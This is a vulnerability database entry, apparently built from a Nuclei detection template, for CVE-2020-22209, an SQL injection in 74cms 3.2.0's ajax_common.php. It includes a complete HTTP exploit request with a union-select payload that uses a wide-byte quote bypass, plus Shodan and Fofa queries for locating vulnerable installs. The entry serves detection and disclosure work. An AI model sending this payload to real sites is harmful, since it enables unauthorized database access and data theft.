🔙 목록으로 돌아가기

CVE-2020-22209: 74cms - ajax_common.php SQL Injection

Title74cms - ajax_common.php SQL Injection
Authorritikchaddha
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying database.
RemediationApply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_common.php file.
CVSS Score9.8
EPSS Score0.45915
CVE IDCVE-2020-22209
CWE IDCWE-89
Shodan Queryhttp.html:"74cms"
Fofa Queryapp="74cms"body="74cms"
Tags cve cve2020 74cms sqli vuln

🔍 Vulnerability Description

SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php.

🌐 HTTP Request

GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(8456),3%23%27 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-22209.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-22209.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A